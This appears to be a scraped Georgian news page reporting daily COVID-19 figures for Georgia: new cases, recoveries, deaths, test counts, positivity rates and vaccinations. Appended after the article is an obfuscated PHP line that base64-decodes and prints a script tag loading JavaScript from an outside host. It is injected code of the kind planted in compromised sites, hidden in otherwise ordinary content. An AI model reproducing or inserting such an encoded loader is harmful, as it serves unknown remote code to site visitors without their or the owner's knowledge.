celsiusi
ავერსი შნაიდერი
საქართველოში კორონავირუსის 13 288 ახალი შემთხვევა გამოვლინდა. ამის შესახებ ინფორმაცია მთავრობის სპეციალურ ვებგვერდ stopcov.ge-ზე ცოტა ხნის წინ განახლდა.
 
ქვეყანაში ბოლო 24 საათში 21 183 ადამიანი გამოჯანმრთელდა. ბოლო დღე-ღამეში კორონავირუსით გარდაიცვალა 51 პაციენტი.
 
ბოლო 24 საათში ქვეყანაში ჩატარდა 47 640 ტესტი, მათ შორის ანტიგენის სწრაფი ტესტით – 28 888, „პისიარ“ ტესტით – 18 752.
 
ქვეყანაში კორონავირუსის გამოვლენის დადებითობის მაჩვენებლებია: დღიური – 27,89%, ბოლო 14 დღის – 31,94%, ბოლო 7 დღის – 30,35%.
 
საქართველოში კორონავირუსით ინფიცირების სულ 1 539 493 შემთხვევაა გამოვლენილი, მათგან  1 369 764 გამოჯანმრთელდა, 15 822კი, გარდაიცვალა.
 
სულ ჩატარდა 2 794 933 აცრა, დღიურად აცრილია 3 009.
 
კარანტინის რეჟიმშია 16, სტაციონარში მეთვალყურეობას 5 703 ადამიანი გადის, კლინიკურ სასტუმროში იმყოფება 964 პირი.
 
ამასთან, 18 თებერვლის მდგომარეობით, საქართველოში კორონავირუსის 14 405 ახალი შემთხვევა გამოვლინდა, გამოჯანმრთელდა 24 409 პაციენტი, გარდაიცვალა 42.
 
 
824
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");